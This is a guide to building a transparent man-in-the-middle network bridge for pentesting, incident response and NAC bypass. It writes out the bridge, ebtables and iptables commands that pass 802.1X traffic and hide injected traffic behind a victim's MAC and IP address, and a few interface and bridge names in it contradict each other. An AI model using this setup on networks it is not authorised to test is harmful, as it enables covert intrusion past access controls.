Creating a Man-In-the-Middle Bridge (MIBR)

A Man-In-the-Middle Bridge is a device you insert between a computer and a network switch that transparently forwards traffic whilst allowing full control over the traffic. It has multiple uses including Incident Response, network inspection and injection, pentesting and NAC bypass.

Incident Response Capturing traffic between an infected computer and a command and control computer
Network Inspection / Injection Allows traffic to be captured and injected
Penetration Testing Stealthy way of accessing the network and also a way of providing assurance by connecting the pentest laptop to the MIBR inject port and capturing all traffic on the MIBR. Any discussion about what did or did not take place can be easily verified. It also has the advantage of not requiring any additional switch ports to be configured as you use an existing one
NAC Bypass Many enterprises implement NAC (Network Admission Control) which prevents unauthorised devices from being connected. Using the MIBR the victim computer provides the authentication which is forwarded to the switch port

Hardware Requirements


The hardware requirements for the MIBR are any device with at least two network adapters, three are required if you want to connect another device to the bridge. I've tried various combinations and each has it's own pros and cons, my work horse for reliability is the PCengines APU2 but the Raspberry PI 3-B is more affordable and offers interfacing not found on the APU2.

Type NICsProsConsMemory (MB)Price (Approx)OS
Laptop + USB Network Adapter 2Relatively cheap and easySize, throughput limited by USB2048-32768 GB40 EurAny
Soekris 4801 3Small Form Factor, possible wireless extensionThroughput limited by CPU, low memory256120 Eurvoyage
Soekris 6501 4Small Form Factor, possible wireless extensionThroughput limited by USB speeds512-2048180 EurAny
PCengines APU2 3Small Form Factor, built-in GSM, possible wireless extension 4096182 EurAny
Raspberry PI 3-B  + USB Network Adapter 1Small Form Factor, CheapSpeed limited by USB102445 EurAny
Raspberry PI Zero  + 2x USB Network Adapter and USB Hub 1Small Form Factor, CheapSpeed limited by USB,Messy with all the connectors, prefer 3-B5125 EurAny

Irrespective of the platform the scripts assume that the interfaces are used as follows:

eth0Connected to Switch
eth1Connected to Victim device
eth2Connect your laptop here (use IP 192.168.0.2/24)

The names of the interfaces and many other parameters can be adjusted in the script or via the config files it creates automatically.

Software Requirements


The MIBR uses the native bridge capabilities of the Linux kernel, any linux distro should work as long as fits on your hardware. The script makes use of the following tools:
brctlBridge tools
iptablesprovides IP firewalling
ebtablesprovides L2 (bridge) firewalling

Which OS to use and how you configure it is outside the scope of this document, any linux distro should work.

Usage

The enclosed bash script simplifies the use of the MIBR by configuring the network interfaces and setting bridge mode. This is styled as a SYSV script and uses command line parameters:
bridge.shShows all options
bridge.sh startConfigure all interfaces and set bridge mode
bridge.sh stopStop the bridge
bridge.sh restartPerform a stop/start
bridge.sh statusShow the status of the bridge
bridge.sh setspoofAdd an inject interface and configure IP and NAT using CIFS info from victim captured on TCP/445
bridge.sh setspoofdhcpAdd an inject interface and configure IP and NAT using DHCP info from victim (disconnect victim link to force)

Background

The linux kernel supports native bridging, setting up the bridge manually would involve the following sequence:
	ifconfig eth0 0.0.0.0                       # Remove any IP address
	ifconfig eth0 down                          # Take interface down
	ifconfig eth0 hw ether de:ad:be:ef:d4:ad    # Force MAC addresss

	ifconfig eth1 0.0.0.0
	ifconfig eth1 down
	ifconfig eth1 hw ether de:ad:be:ef:d4:ae

	ifconfig eth2 0.0.0.0
	ifconfig eth2 down
	ifconfig eth2 hw ether de:ad:be:ef:d4:af
	ifconfig eth2 192.168.0.1 netmask 255.255.255.0

	brctl delbr mibr                            # Delete any existing bridge
	brctl addbr mibr                            # Create a new bridge interface
	brctl addif mibr eth0                       # Add eth0 (connected to victim computer)
	brctl addif mibr eth1                       # Add eth1 (connected to switch)
	brctl stp off                               # Turn off Spanning Tree

	# The value used here depends on the Kernel version, 8 works on most but patched versions support 49144
	# Set bridge to pass all L2 traffic (such as 802.1x) this makes it non 802.1D compliant
	echo 8     > /sys/class/net/br0/bridge/group_fwd_mask
	echo 49144 > /sys/class/net/br0/bridge/group_fwd_mask

	# Ignore IPv6 Router advertisements
	echo 0 > /proc/sys/net/ipv6/conf/br0/accept_ra

	#arptables -A OUTPUT -o eth1 -j DROP        # Make sure that ARP traffic is dropped from the attacker
	ifconfig mibr up                            # Bring up bridge interface (takes about 30-60 secs for the interface to settle)

With this configuration the bridge is now transparently configured to pass L2 (and above) traffic between the switch and the victim.

The next step is to configure the bridge to allow traffic injection by setting up L2 translation (ebtables) and NAT (iptables) for the attacker traffic

The pre-requisite for this is to determine the Victims IP & MAC address and find an unused IP address on the victim network; this can easily be found by using tcpdump/tshark on the victim interface (eth0). The logic for this is encapsulated in the setspoof and setspoofdhcp commands supported by the bridge.sh

	SWINT=eth1                                  # Switch side Interface
	SWMAC=de:ad:be:ef:4d:ae                     # Switch side MAC address

	COMPMAC=xx:xx:xx:xx:xx:xx                   # Victim MAC address
	COMIP=yyy.yyy.yyy.yyy                       # Victim IP address

	BRINT=mibr                                  # Bridge Interface

	BRIP4=yyy.yyy.yyy.yyy-2                     # An usused IP address on the victim network
	RANGE4=60000-61000                          # Range of ports to use

	# L2 NAT
	ebtables -t nat -A POSTROUTING -s ${SWMAC} -o ${SWINT} -j snat --to-src ${COMPMAC}

	# IPv4 NAT
	iptables -t nat -A POSTROUTING -s ${BRIP4} -o ${BRINT} -p tcp -j SNAT --to ${COMIP}:${RANGE4}

	# IPv6 NAT (remove if no IPv6)
	BRIP6=                                      # An usused IPv6 address on the victim network
	RANGE6=58000-59999                          # Range of ports to use

	ip6tables -t nat -A POSTROUTING -s ${BRIP6} -o ${BRINT} -j SNAT --to-source [$COMIP6]:${RANGE6}


For further reading see this excellent paper which contains many links to similar work in this area.